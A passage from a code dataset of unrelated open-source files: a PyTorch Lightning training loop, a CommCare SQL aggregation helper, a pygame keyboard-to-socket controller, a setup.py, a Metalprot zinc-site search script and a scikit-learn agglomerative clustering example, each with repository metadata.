            grad_norm_dic=grad_norm_dic,
            training_step_output_for_epoch_end=batch_outputs,
        )
        return result
    @contextmanager
    def block_ddp_sync_behaviour(self, should_block_sync: bool = False):
        """
        automatic_optimization = True
        Blocks ddp sync gradients behaviour on backwards pass.
        This is useful for skipping sync when accumulating gradients, reducing communication overhead

        automatic_optimization = False
        do not block ddp gradient sync when using manual optimization
        as gradients are needed within the training step

        Returns:
            context manager with sync behaviour off
        """
        if (
            isinstance(self.trainer.training_type_plugin, ParallelPlugin)
            and (self.trainer.lightning_module.automatic_optimization or should_block_sync)
        ):
            with self.trainer.training_type_plugin.block_backward_sync():
                yield None
        else:
            yield None

    def _process_closure_result(self, batch_outputs: list, opt_idx: int) -> list:
        opt_closure_result = self._curr_step_result

        if opt_closure_result is not None:

            # cache metrics
            self.trainer.logger_connector.cache_training_step_metrics(opt_closure_result)

            # check if loss or model weights are nan
            if self.trainer.terminate_on_nan:
                self._check_finite(opt_closure_result.loss)

            # track all the outputs across all steps
            batch_opt_idx = opt_idx if len(batch_outputs) > 1 else 0
            batch_outputs[batch_opt_idx].append(opt_closure_result.training_step_output_for_epoch_end)

            if self.trainer.lightning_module.automatic_optimization:
                # track total loss for logging (avoid mem leaks)
                self.accumulated_loss.append(opt_closure_result.loss)

        self._curr_step_result = None
        return batch_outputs
    def training_step_and_backward(self, split_batch, batch_idx, opt_idx, optimizer, hiddens):
        """Wrap forward, zero_grad and backward in a closure so second order methods work"""
        with self.trainer.profiler.profile("training_step_and_backward"):
            # lightning module hook
            result = self.training_step(split_batch, batch_idx, opt_idx, hiddens)
            self._curr_step_result = result

            if not self._skip_backward and self.trainer.lightning_module.automatic_optimization:
                is_first_batch_to_accumulate = batch_idx % self.trainer.accumulate_grad_batches == 0

                if is_first_batch_to_accumulate:
                    self.on_before_zero_grad(optimizer)
                    self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)

                # backward pass
                if result is not None:
                    with self.trainer.profiler.profile("backward"):
                        self.backward(result, optimizer, opt_idx)

                    # hook - call this hook only
                    # when gradients have finished accumulating
                    if not self.should_accumulate():
                        self.on_after_backward(result.training_step_output, batch_idx, result.loss)

                    # check if loss or model weights are nan
                    if self.trainer.terminate_on_nan:
                        self._check_finite(result.loss)

                else:
                    self.warning_cache.warn(
                        "training_step returned None. If this was on purpose, ignore this warning..."
                    )

                if len(self.trainer.optimizers) > 1:
                    # revert back to previous state
                    self.trainer.lightning_module.untoggle_optimizer(opt_idx)

        return result

    def _check_finite(self, loss: torch.Tensor) -> None:
        if not torch.isfinite(loss).all():
            raise ValueError(f'The loss returned in `training_step` is {loss}.')
        model = self.trainer.lightning_module
        detect_nan_parameters(model)

    def backward(self, result, optimizer, opt_idx, *args, **kwargs):
        self.trainer.dev_debugger.track_event("backward_call")

        should_accumulate = self.should_accumulate()

        # backward can be called manually in the training loop
        if isinstance(result, torch.Tensor):
            self.trainer.accelerator.backward(result, optimizer, opt_idx, should_accumulate, *args, **kwargs)
        else:
            result.closure_loss = self.trainer.accelerator.backward(
                result.closure_loss, optimizer, opt_idx, should_accumulate, *args, **kwargs
            )

            if not self.should_accumulate():
                # track gradients
                self.track_and_norm_grad(optimizer=optimizer)
    def update_train_loop_lr_schedulers(self, monitor_metrics=None):
        num_accumulated_batches_reached = self._accumulated_batches_reached()
        num_training_batches_reached = self._num_training_batches_reached()

        if num_accumulated_batches_reached or num_training_batches_reached:
            # update lr
            self.trainer.optimizer_connector.update_learning_rates(
                interval="step",
                monitor_metrics=monitor_metrics,
                opt_indices=[opt_idx for opt_idx, _ in self.get_optimizers_iterable()],
            )

    def increment_accumulated_grad_global_step(self):
        num_accumulated_batches_reached = self._accumulated_batches_reached()
        num_training_batches_reached = self._num_training_batches_reached()

        # progress global step according to grads progress
        if num_accumulated_batches_reached or num_training_batches_reached:
            self.trainer.global_step = self.trainer.accelerator.update_global_step(
                self.trainer.total_batch_idx, self.trainer.global_step
            )

    def _accumulated_batches_reached(self):
        return (self.trainer.batch_idx + 1) % self.trainer.accumulate_grad_batches == 0

    def _num_training_batches_reached(self, is_last_batch=False):
        return (self.trainer.batch_idx + 1) == self.trainer.num_training_batches or is_last_batch

    def should_accumulate(self):
        # checks if backward or backward + optimizer step (via closure)
        accumulation_done = self._accumulated_batches_reached()
        is_final_batch = self._num_training_batches_reached()
        return not (accumulation_done or is_final_batch)

    def _should_check_val_fx(self, batch_idx: int, is_last_batch: bool, on_epoch: bool = False) -> bool:
        """ Decide if we should run validation. """

        if not self.trainer.enable_validation:
            return False

        # check if this epoch is eligible to run validation
        if (self.trainer.current_epoch + 1) % self.trainer.check_val_every_n_epoch != 0:
            return False

        # val_check_batch is inf for iterable datasets with no length defined
        # TODO: let training/eval loop handle logic around limit_*_batches and val_check_batch
        is_val_check_batch = False
        if isinstance(self.trainer.limit_train_batches, int) and self.trainer.val_check_batch == float('inf'):
            is_val_check_batch = (batch_idx + 1) % self.trainer.limit_train_batches == 0
        elif self.trainer.val_check_batch != float('inf'):
            is_val_check_batch = (batch_idx + 1) % self.trainer.val_check_batch == 0

        # Note: num_training_batches is also inf for iterable datasets with no length defined
        epoch_end_val_check = (batch_idx + 1) % self.trainer.num_training_batches == 0
        is_last_batch_for_infinite_dataset = is_last_batch and self.trainer.val_check_batch == float("inf")

        if on_epoch:
            return (
                is_val_check_batch and epoch_end_val_check
            ) or self.trainer.should_stop or is_last_batch_for_infinite_dataset
        else:
            return is_val_check_batch and not epoch_end_val_check
    def build_train_args(self, batch, batch_idx, opt_idx, hiddens):
        # enable not needing to add opt_idx to training_step
        args = [batch, batch_idx]

        if len(self.trainer.optimizers) > 1:
            if self.trainer.has_arg("training_step", "optimizer_idx"):
                if not self.trainer.lightning_module.automatic_optimization:
                    self.warning_cache.warn(
                        "`training_step` hook signature has changed in v1.3."
                        " `optimizer_idx` argument has been removed in case of manual optimization. Support for"
                        " the old signature will be removed in v1.5", DeprecationWarning
                    )
                args.append(opt_idx)
            elif not self.trainer.has_arg(
                "training_step", "optimizer_idx"
            ) and self.trainer.lightning_module.automatic_optimization:
                raise ValueError(
                    f"Your LightningModule defines {len(self.trainer.optimizers)} optimizers but"
                    ' `training_step` is missing the `optimizer_idx` argument.'
                )

        # pass hiddens if using tbptt
        if self._truncated_bptt_enabled():
            args.append(hiddens)

        return args

    def _truncated_bptt_enabled(self) -> bool:
        """ Temporary tbptt utilities until this flag is fully migrated to the lightning module. """
        return self._truncated_bptt_steps() > 0

    def _truncated_bptt_steps(self) -> int:
        lightning_module = self.trainer.lightning_module
        # Give precedence to the LightningModule as the Trainer flag will be removed in v1.5
        if lightning_module.truncated_bptt_steps > 0:
            return lightning_module.truncated_bptt_steps
        return self.trainer.truncated_bptt_steps or 0

    def save_loggers_on_train_batch_end(self):
        # when loggers should save to disk
        should_flush_logs = self.trainer.logger_connector.should_flush_logs
        if should_flush_logs and self.trainer.is_global_zero and self.trainer.logger is not None:
            self.trainer.logger.save()

    def prepare_optimizers(self):
        # in manual optimization we loop over all optimizers at once
        optimizers = self.get_optimizers_iterable()
        if not self.trainer.lightning_module.automatic_optimization:
            optimizers = [optimizers[0]]
        return optimizers

    def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer):
        # set split_idx to trainer for tracking
        self.trainer.split_idx = split_idx

        # make sure only the gradients of the current optimizer's parameters are calculated
        # in the training step to prevent dangling gradients in multiple-optimizer setup.
        if self.trainer.lightning_module.automatic_optimization and len(self.trainer.optimizers) > 1:
            model = self.trainer.lightning_module
            model.toggle_optimizer(optimizer, opt_idx)

        # use to track metrics internally
        self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch)

    def update_running_loss(self):
        accumulated_loss = self.accumulated_loss.mean()

        if accumulated_loss is not None:
            # calculate running loss for display
            self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches)

        # reset for next set of accumulated grads
        self.accumulated_loss.reset()
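
A minimal, self-contained sketch of the dimension-collapsing rule implemented by _prepare_outputs above, run on toy data. FakeResult is a hypothetical stand-in for pytorch-lightning's Result object, and the structure and values are made up for illustration:

from dataclasses import dataclass, field


@dataclass
class FakeResult:
    # hypothetical stand-in for pytorch_lightning.core.step_result.Result
    minimize: float
    extra: dict = field(default_factory=dict)


def collapse(outputs, batch_mode):
    # mirrors TrainLoop._prepare_outputs: convert to dicts, collapse size-1 dims
    processed = []
    for opt_outputs in outputs:
        if len(opt_outputs) == 0:
            continue
        if batch_mode:
            opt_outputs = [opt_outputs]
        per_batch = []
        for batch_outputs in opt_outputs:
            tbptt = [dict(o.extra, loss=o.minimize) for o in batch_outputs]
            per_batch.append(tbptt[0] if len(tbptt) == 1 else tbptt)
        processed.append(per_batch[0] if batch_mode else per_batch)
    return processed[0] if len(processed) == 1 else processed


# batch mode input is [optimizers][tbptt]: both size-1 dims collapse to one dict
assert collapse([[FakeResult(0.5)]], batch_mode=True) == {'loss': 0.5}
# epoch mode input is [optimizers][batches][tbptt]: the batch dim is kept as a list
assert collapse([[[FakeResult(0.5)]]], batch_mode=False) == [{'loss': 0.5}]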
custom/icds_reports/utils/aggregation_helpers/distributed/thr_forms_child_health.py | kkrampa/commcare-hq | BSD-3-Clause
from __future__ import absolute_import
from __future__ import unicode_literals

from dateutil.relativedelta import relativedelta

from custom.icds_reports.const import AGG_CHILD_HEALTH_THR_TABLE
from custom.icds_reports.utils.aggregation_helpers import month_formatter
from custom.icds_reports.utils.aggregation_helpers.distributed.base import BaseICDSAggregationDistributedHelper


class THRFormsChildHealthAggregationDistributedHelper(BaseICDSAggregationDistributedHelper):
    helper_key = 'thr-forms-child-health'
    ucr_data_source_id = 'static-dashboard_thr_forms'
    tablename = AGG_CHILD_HEALTH_THR_TABLE

    def aggregate(self, cursor):
        drop_query, drop_params = self.drop_table_query()
        agg_query, agg_params = self.aggregation_query()

        cursor.execute(drop_query, drop_params)
        cursor.execute(agg_query, agg_params)

    def drop_table_query(self):
        return (
            'DELETE FROM "{}" WHERE month=%(month)s AND state_id = %(state)s'.format(self.tablename),
            {'month': month_formatter(self.month), 'state': self.state_id}
        )

    def aggregation_query(self):
        month = self.month.replace(day=1)
        current_month_start = month_formatter(self.month)
        next_month_start = month_formatter(self.month + relativedelta(months=1))

        query_params = {
            "month": month_formatter(month),
            "state_id": self.state_id,
            "current_month_start": current_month_start,
            "next_month_start": next_month_start,
        }

        return """
        INSERT INTO "{tablename}" (
          state_id, supervisor_id, month, case_id, latest_time_end_processed, days_ration_given_child
        ) (
          SELECT DISTINCT ON (child_health_case_id)
            %(state_id)s AS state_id,
            LAST_VALUE(supervisor_id) over w AS supervisor_id,
            %(month)s AS month,
            child_health_case_id AS case_id,
            MAX(timeend) over w AS latest_time_end_processed,
            SUM(days_ration_given_child) over w AS days_ration_given_child
          FROM "{ucr_tablename}"
          WHERE state_id = %(state_id)s AND
                timeend >= %(current_month_start)s AND timeend < %(next_month_start)s AND
                child_health_case_id IS NOT NULL
          WINDOW w AS (PARTITION BY supervisor_id, child_health_case_id)
        )
        """.format(
            ucr_tablename=self.ucr_tablename,
            tablename=self.tablename
        ), query_params
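
For orientation, a hypothetical invocation of the helper above. The constructor arguments and the connection alias are assumptions (they live in the base class and calling code, not in this file); the point is the two-step contract of aggregate: delete the month/state slice, then re-insert one aggregated row per child_health case.

from datetime import date

from django.db import connections

# constructor arguments are assumed from the attributes used above (month, state_id)
helper = THRFormsChildHealthAggregationDistributedHelper(state_id='st1', month=date(2021, 10, 1))
with connections['icds-ucr'].cursor() as cursor:  # hypothetical connection alias
    helper.aggregate(cursor)  # DELETE the old slice, then INSERT aggregated rows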
tests/test_formats/test_seq/asserts.py | NickleDave/conbirt | BSD-3-Clause
def assert_rounded_correct_num_decimals(on_offset_arr, decimals):
    __tracebackhide__ = True
    assert all(
        [len(str(float(boundary_s)).split('.')[-1]) <= decimals
         for boundary_s in on_offset_arr]
    )
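
A usage sketch for the assertion helper above: it is meant to be called from a pytest test, where __tracebackhide__ keeps the helper's own frame out of failure tracebacks. The test name and values below are made up.

def test_onsets_rounded_to_three_decimals():
    # hypothetical onset times in seconds; each has at most 3 decimal places
    onsets_s = [0.123, 4.5, 6.789]
    assert_rounded_correct_num_decimals(onsets_s, decimals=3)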
commandWindow.py | sturzl/keyboardControlSocket | Apache-2.0
import customSocket
import sys, pygame

# constants
windowSize = width, height = 800, 600
# displayed in the window to give directions to the driver
instructionTextLines = open('commands.txt').readlines()
activeColor = (0, 175, 0)
inactiveColor = (255, 0, 0)
textColor = (0, 0, 0)
screen = pygame.display.set_mode(windowSize)


################ window initialization #################################
# makes the window, sets the color, displays the instruction text, etc.
def initializeWindow():
    pygame.init()
    setBackgroundColor(activeColor)
    pygame.display.set_caption('CWRU NASA RMC 2015-2016')
    displayInstructionText()


def displayInstructionText():
    for lineNumber, lineText in enumerate(instructionTextLines):
        displayText(lineText, lineNumber)


# creates the text object, puts it in the window, and updates the display
# takes in the string to draw and the line number to draw it on
def displayText(text, lineNumber):
    font = pygame.font.SysFont("monospace", 20)
    textSurface, textContainer = getTextObject(text, font)
    textContainer.center = (width / 2, 10 + 25 * lineNumber)
    screen.blit(textSurface, textContainer)
    pygame.display.update()


# gets the font, text rectangle, etc.
# takes in the string to render and a pygame Font
def getTextObject(text, font):
    textSurface = font.render(text, True, textColor)
    return textSurface, textSurface.get_rect()


def setBackgroundColor(colorTuple):
    screen.fill(colorTuple)
    pygame.display.update()


################################ Getting keyboard state ################################
# gets the currently pressed keys and sends them over the socket
# NOTE: sendCommand (and initializeSocket, called at the bottom of this file) are
# assumed to come from the customSocket module imported above; they are not defined here.
def sendKeyPresses():
    quit = False
    keysPressed = []
    while not quit:
        nextEvent = str(pygame.event.wait())
        if 'KeyDown' in nextEvent:
            # socket.customSend(lastEvent.split(', ')[1].split(' ')[1])
            key = nextEvent.split(', ')[1].split(' ')[1]
            sendCommand(translateToHex(key))
            if key == '27':  # escape key: quit
                quit = True
    pygame.quit()
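
# maps a pygame key code (arriving here as a decimal string) to a one-byte command
# code for the receiving side; unrecognized keys fall through to 0. The meaning of
# each code is assumed to be fixed by the robot-side protocol (not shown in this file).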
def translateToHex(key):
    return {
        '273': 76,
        '274': 77,
        '275': 78,
        '276': 79,
        '46': 57,
        '47': 58,
        '115': 33,
        '119': 17,
        '100': 34,
        '97': 32,
        '102': 35,
        '114': 19,
        '104': 37,
        '32': 64,
        '111': 24,
        '27': 69,
    }.get(key, 0)


# Waits for a keyboard event, determines which keys are pressed after each keyboard event,
# returns the list of currently pressed keys
def getNextKeys():
    return getCurrentKeys()


# def sendKeys(keys):
#     socket.send(keys)


def getCurrentKeys():
    pygameEvent = pygame.event.wait()
    if pygameEvent.type == pygame.KEYDOWN:
        return pygame.key.get_pressed()


############### Main program ####################################
initializeWindow()
initializeSocket()
sendKeyPresses()
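
sendKeyPresses above extracts the key code by string-splitting the event's repr instead of reading event.key directly. A hedged illustration of why the split works; the sample string is an assumed pygame 1.x repr, which can vary across pygame versions:

# assumed repr of a KeyDown event under pygame 1.x
event_str = "<Event(2-KeyDown {'unicode': 'a', 'key': 97, 'mod': 0})>"
key = event_str.split(', ')[1].split(' ')[1]  # isolates the value of the 'key' field
assert key == '97'  # the decimal key code for 'a'
# translateToHex('97') then returns 32, the command byte sent over the socket

Reading pygameEvent.key directly from the event object would be the sturdier alternative to this string parsing.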
setup.py | NikitaKoshelev/aio-space-track-api | MIT
# -*- coding: utf-8 -*-
import codecs
import re
import sys
from distutils.core import setup
import os
if sys.version_info < (3, 5, 0):
raise RuntimeError("aio-space-track-api requires Python 3.5.0+")
PROJECT_DIR = os.path.abspath(os.path.dirname(__file__))
VERSION_REGEXP = re.compile(r"^__version__ = [\'\"](.+?)[\'\"]$", re.MULTILINE)
def read(fn):
with codecs.open(os.path.join(PROJECT_DIR, fn), encoding='utf-8') as f:
return f.read().strip()
def version():
try:
return VERSION_REGEXP.findall(read(os.path.join('aio_space_track_api', '__init__.py')))[0]
except IndexError:
raise RuntimeError('Unable to determine version.')
vn = version()
url = 'https://github.com/nkoshell/aio-space-track-api'
setup(
name='aio-space-track-api',
description='Small async wrapper for "space-track-api" package.',
long_description=read('README.rst'),
version=vn,
packages=['aio_space_track_api'],
url=url,
download_url='{url}/archive/{version}.tar.gz'.format(url=url, version=vn),
license='MIT',
author='NikitaKoshelev',
author_email='nikita.koshelev@gmail.com',
install_requires=['aiohttp>=2.0.7', 'space-track-api>=1.0.2'],
)
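# Editor's sketch (illustrative only, not part of the original setup.py):
# VERSION_REGEXP scans module source line by line (re.MULTILINE anchors ^/$)
# and captures the quoted value; the sample source below is hypothetical.
def _version_regexp_demo():
    sample = "name = 'pkg'\n__version__ = '1.2.3'\n"
    assert VERSION_REGEXP.findall(sample) == ['1.2.3']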
| 26.866667
| 98
| 0.671629
|
import codecs
import re
import sys
from distutils.core import setup
import os
if sys.version_info < (3, 5, 0):
raise RuntimeError("aio-space-track-api requires Python 3.5.0+")
PROJECT_DIR = os.path.abspath(os.path.dirname(__file__))
VERSION_REGEXP = re.compile(r"^__version__ = [\'\"](.+?)[\'\"]$", re.MULTILINE)
def read(fn):
with codecs.open(os.path.join(PROJECT_DIR, fn), encoding='utf-8') as f:
return f.read().strip()
def version():
try:
return VERSION_REGEXP.findall(read(os.path.join('aio_space_track_api', '__init__.py')))[0]
except IndexError:
raise RuntimeError('Unable to determine version.')
vn = version()
url = 'https://github.com/nkoshell/aio-space-track-api'
setup(
name='aio-space-track-api',
description='Small async wrapper for "space-track-api" package.',
long_description=read('README.rst'),
version=vn,
packages=['aio_space_track_api'],
url=url,
download_url='{url}/archive/{version}.tar.gz'.format(url=url, version=vn),
license='MIT',
author='NikitaKoshelev',
author_email='nikita.koshelev@gmail.com',
install_requires=['aiohttp>=2.0.7', 'space-track-api>=1.0.2'],
)
| true
| true
|
790dc5ee729167a086621216d1bf4f04687ccc62
| 3,575
|
py
|
Python
|
scrips/search_selfcenter/run_selfcenter_search.py
|
lonelu/Metalprot
|
e51bee472c975aa171bdb6ee426a07ca69f110ee
|
[
"MIT"
] | null | null | null |
scrips/search_selfcenter/run_selfcenter_search.py
|
lonelu/Metalprot
|
e51bee472c975aa171bdb6ee426a07ca69f110ee
|
[
"MIT"
] | null | null | null |
scrips/search_selfcenter/run_selfcenter_search.py
|
lonelu/Metalprot
|
e51bee472c975aa171bdb6ee426a07ca69f110ee
|
[
"MIT"
] | null | null | null |
#You can either add the python package path.
#sys.path.append(r'/mnt/e/GitHub_Design/Metalprot')
from metalprot.search import search_selfcenter
from metalprot.basic import filter
import pickle
import time
import prody as pr
'''
python /mnt/e/GitHub_Design/Metalprot/scrips/search_selfcenter/run_selfcenter_search.py
'''
start_time = time.time()
query_dir = '/mnt/e/DesignData/ligands/ZN_rcsb_datesplit/20211013/20211013_selfcenter/pickle_noCYS/'
with open(query_dir + 'all_metal_vdm.pkl', 'rb') as f:
query_all_metal = pickle.load(f)
with open(query_dir + 'AAMetalPhiPsi.pkl', 'rb') as f:
all_querys = pickle.load(f)
with open(query_dir + 'cluster_centroid_dict.pkl', 'rb') as f:
cluster_centroid_dict = pickle.load(f)
print(len(all_querys))
### run Search_struct
workdir = '/mnt/e/DesignData/ligands/LigandBB/MID1sc10/'
outdir = workdir + 'output_selfcenter/'
target_path = workdir + '5od1_zn.pdb'
win_filter = [35, 61, 65]
# workdir = '/mnt/e/DesignData/ligands/LigandBB/6dwv/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + '6dwv_core.pdb'
# win_filter = []
# workdir = '/mnt/e/DesignData/ligands/LigandBB/8adh/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + '1989_8adh_ZN_1.pdb'
# win_filter = []
# workdir = '/mnt/e/DesignData/ligands/LigandBB/3f7u_lig/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + '3f7u1aa.pdb'
# win_filter = [94, 96, 119]
# workdir = '/mnt/e/DesignData/ligands/LigandBB/2afw_lig/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + '2afw_aa.pdb'
# win_filter = [159, 202, 330]
# workdir = '/mnt/e/DesignData/ligands/LigandBB/huong/'
# outdir = workdir + 'output_selfcenter/'
# target_path = workdir + 'aQ4x_aa.pdb'
# win_filter = ['I-3', 'I-6', 'I-10', 'I-13', 'I-17', 'I-20',
# 'J-3', 'J-6', 'J-7', 'J-10', 'J-13', 'J-14', 'J-17', 'J-20', 'J-21',
# 'K-6', 'K-10', 'K-13', 'K-17', 'K-20',
# 'L-3', 'L-6', 'L-7', 'L-10', 'L-13', 'L-14', 'L-17', 'L-20', 'L-21', 'L-24',
# 'M-3', 'M-6', 'M-10', 'M-13', 'M-17', 'M-20',
# 'N-3', 'N-6', 'N-7', 'N-10', 'N-13', 'N-14', 'N-17', 'N-20', 'N-21'
# ]
geometry_path = None
#geometry_path = workdir + 'tetrahydral_geo.pdb'
metal_metal_dist = 0.3
num_contact_vdms = [3]
allowed_aa_combinations = [['H', 'H', 'H']]
allowed_aa_combinations = []
_filter = filter.Search_filter(filter_abple = False, filter_phipsi = True, max_phipsi_val = 25,
filter_vdm_score = False, min_vdm_score = 0, filter_vdm_count = False, min_vdm_clu_num = 20,
after_search_filter_geometry = True, filter_based_geometry_structure = False, angle_tol = 15, aa_aa_tol = 0.3, aa_metal_tol = 0.2,
pair_angle_range = [85, 130], pair_aa_aa_dist_range = [2.8, 4], pair_metal_aa_dist_range = None,
after_search_filter_qt_clash = True, vdm_vdm_clash_dist = 2.7, vdm_bb_clash_dist = 2.2,
after_search_open_site_clash = True, open_site_dist = 3.0,
write_filtered_result = False, selfcenter_filter_member_phipsi=True)
ss = search_selfcenter.Search_selfcenter(target_path, outdir, all_querys, cluster_centroid_dict, query_all_metal,
num_contact_vdms, metal_metal_dist, win_filter, validateOriginStruct = True, search_filter= _filter, geometry_path = None,
density_radius = 0.6, allowed_aa_combinations = allowed_aa_combinations, output_wincomb_overlap=True)
#ss.run_selfcenter_search()
search_selfcenter.run_search_selfcenter(ss)
end_time = time.time()
print(end_time - start_time, "seconds")
| 30.555556
| 134
| 0.687552
|
from metalprot.search import search_selfcenter
from metalprot.basic import filter
import pickle
import time
import prody as pr
start_time = time.time()
query_dir = '/mnt/e/DesignData/ligands/ZN_rcsb_datesplit/20211013/20211013_selfcenter/pickle_noCYS/'
with open(query_dir + 'all_metal_vdm.pkl', 'rb') as f:
query_all_metal = pickle.load(f)
with open(query_dir + 'AAMetalPhiPsi.pkl', 'rb') as f:
all_querys = pickle.load(f)
with open(query_dir + 'cluster_centroid_dict.pkl', 'rb') as f:
cluster_centroid_dict = pickle.load(f)
print(len(all_querys))
workdir = '/mnt/e/DesignData/ligands/LigandBB/MID1sc10/'
outdir = workdir + 'output_selfcenter/'
target_path = workdir + '5od1_zn.pdb'
win_filter = [35, 61, 65]
geometry_path = None
metal_metal_dist = 0.3
num_contact_vdms = [3]
allowed_aa_combinations = [['H', 'H', 'H']]
allowed_aa_combinations = []
_filter = filter.Search_filter(filter_abple = False, filter_phipsi = True, max_phipsi_val = 25,
filter_vdm_score = False, min_vdm_score = 0, filter_vdm_count = False, min_vdm_clu_num = 20,
after_search_filter_geometry = True, filter_based_geometry_structure = False, angle_tol = 15, aa_aa_tol = 0.3, aa_metal_tol = 0.2,
pair_angle_range = [85, 130], pair_aa_aa_dist_range = [2.8, 4], pair_metal_aa_dist_range = None,
after_search_filter_qt_clash = True, vdm_vdm_clash_dist = 2.7, vdm_bb_clash_dist = 2.2,
after_search_open_site_clash = True, open_site_dist = 3.0,
write_filtered_result = False, selfcenter_filter_member_phipsi=True)
ss = search_selfcenter.Search_selfcenter(target_path, outdir, all_querys, cluster_centroid_dict, query_all_metal,
num_contact_vdms, metal_metal_dist, win_filter, validateOriginStruct = True, search_filter= _filter, geometry_path = None,
density_radius = 0.6, allowed_aa_combinations = allowed_aa_combinations, output_wincomb_overlap=True)
search_selfcenter.run_search_selfcenter(ss)
end_time = time.time()
print(end_time - start_time, "seconds")
| true
| true
|
790dc638b44f4387a90ba0b5662e7ebdc15d51ee
| 3,092
|
py
|
Python
|
examples/cluster/plot_digits_linkage.py
|
emarkou/scikit-learn
|
d73822f84f2832dcc25f0ff58769f60871a78025
|
[
"BSD-3-Clause"
] | 13
|
2020-01-04T07:37:38.000Z
|
2021-08-31T05:19:58.000Z
|
examples/cluster/plot_digits_linkage.py
|
emarkou/scikit-learn
|
d73822f84f2832dcc25f0ff58769f60871a78025
|
[
"BSD-3-Clause"
] | 29
|
2021-03-04T02:56:48.000Z
|
2021-04-06T04:06:45.000Z
|
examples/cluster/plot_digits_linkage.py
|
emarkou/scikit-learn
|
d73822f84f2832dcc25f0ff58769f60871a78025
|
[
"BSD-3-Clause"
] | 12
|
2021-02-05T20:33:04.000Z
|
2022-02-17T04:11:25.000Z
|
"""
=============================================================================
Various Agglomerative Clustering on a 2D embedding of digits
=============================================================================
An illustration of various linkage options for agglomerative clustering on
a 2D embedding of the digits dataset.
The goal of this example is to show intuitively how the metrics behave, and
not to find good clusters for the digits. This is why the example works on a
2D embedding.
What this example shows us is the "rich getting richer" behavior of
agglomerative clustering that tends to create uneven cluster sizes.
This behavior is pronounced for the average linkage strategy,
which ends up with a couple of singleton clusters, while in the case
of single linkage we get a single central cluster with all other clusters
being drawn from noise points around the fringes.
"""
# Authors: Gael Varoquaux
# License: BSD 3 clause (C) INRIA 2014
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
X, y = datasets.load_digits(return_X_y=True)
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
# Having a larger dataset shows more clearly the behavior of the
# methods, but we multiply the size of the dataset only by 2, as the
# cost of the hierarchical clustering methods are strongly
# super-linear in n_samples
shift = lambda x: ndimage.shift(x.reshape((8, 8)),
.3 * np.random.normal(size=2),
mode='constant',
).ravel()
X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
Y = np.concatenate([y, y], axis=0)
return X, Y
X, y = nudge_images(X, y)
#----------------------------------------------------------------------
# Visualize the clustering
def plot_clustering(X_red, labels, title=None):
x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
X_red = (X_red - x_min) / (x_max - x_min)
plt.figure(figsize=(6, 4))
for i in range(X_red.shape[0]):
plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
color=plt.cm.nipy_spectral(labels[i] / 10.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([])
plt.yticks([])
if title is not None:
plt.title(title, size=17)
plt.axis('off')
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
#----------------------------------------------------------------------
# 2D embedding of the digits dataset
print("Computing embedding")
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
for linkage in ('ward', 'average', 'complete', 'single'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
t0 = time()
clustering.fit(X_red)
print("%s :\t%.2fs" % (linkage, time() - t0))
plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
plt.show()
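# Editor's sketch (toy data, not part of the original example): the first two
# lines of plot_clustering are a per-axis min-max normalization into [0, 1].
def _minmax_demo():
    pts = np.array([[0., 10.], [5., 20.], [10., 30.]])
    lo, hi = np.min(pts, axis=0), np.max(pts, axis=0)
    scaled = (pts - lo) / (hi - lo)
    assert scaled.min() == 0.0 and scaled.max() == 1.0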
| 33.608696
| 77
| 0.614166
|
print(__doc__)
from time import time
import numpy as np
from scipy import ndimage
from matplotlib import pyplot as plt
from sklearn import manifold, datasets
X, y = datasets.load_digits(return_X_y=True)
n_samples, n_features = X.shape
np.random.seed(0)
def nudge_images(X, y):
shift = lambda x: ndimage.shift(x.reshape((8, 8)),
.3 * np.random.normal(size=2),
mode='constant',
).ravel()
X = np.concatenate([X, np.apply_along_axis(shift, 1, X)])
Y = np.concatenate([y, y], axis=0)
return X, Y
X, y = nudge_images(X, y)
def plot_clustering(X_red, labels, title=None):
x_min, x_max = np.min(X_red, axis=0), np.max(X_red, axis=0)
X_red = (X_red - x_min) / (x_max - x_min)
plt.figure(figsize=(6, 4))
for i in range(X_red.shape[0]):
plt.text(X_red[i, 0], X_red[i, 1], str(y[i]),
color=plt.cm.nipy_spectral(labels[i] / 10.),
fontdict={'weight': 'bold', 'size': 9})
plt.xticks([])
plt.yticks([])
if title is not None:
plt.title(title, size=17)
plt.axis('off')
plt.tight_layout(rect=[0, 0.03, 1, 0.95])
print("Computing embedding")
X_red = manifold.SpectralEmbedding(n_components=2).fit_transform(X)
print("Done.")
from sklearn.cluster import AgglomerativeClustering
for linkage in ('ward', 'average', 'complete', 'single'):
clustering = AgglomerativeClustering(linkage=linkage, n_clusters=10)
t0 = time()
clustering.fit(X_red)
print("%s :\t%.2fs" % (linkage, time() - t0))
plot_clustering(X_red, clustering.labels_, "%s linkage" % linkage)
plt.show()
| true
| true
|
790dc67de74e78dc435d99eafd8bb9751781cbb1
| 6,253
|
py
|
Python
|
qiushaoyi/programs/qsy_program_codes/python3-webapp/www/coroweb.py
|
qsyPython/Python_play_now
|
278b6d5d30082f8f93b26902c854737c4919405a
|
[
"MIT"
] | 2
|
2018-03-29T08:26:17.000Z
|
2019-06-17T10:56:19.000Z
|
qiushaoyi/programs/qsy_program_codes/python3-webapp/www/coroweb.py
|
qsyPython/Python_play_now
|
278b6d5d30082f8f93b26902c854737c4919405a
|
[
"MIT"
] | 1
|
2022-03-22T20:26:08.000Z
|
2022-03-22T20:26:08.000Z
|
qiushaoyi/programs/qsy_program_codes/python3-webapp/www/coroweb.py
|
qsyPython/Python_play_now
|
278b6d5d30082f8f93b26902c854737c4919405a
|
[
"MIT"
] | 1
|
2019-02-18T10:44:20.000Z
|
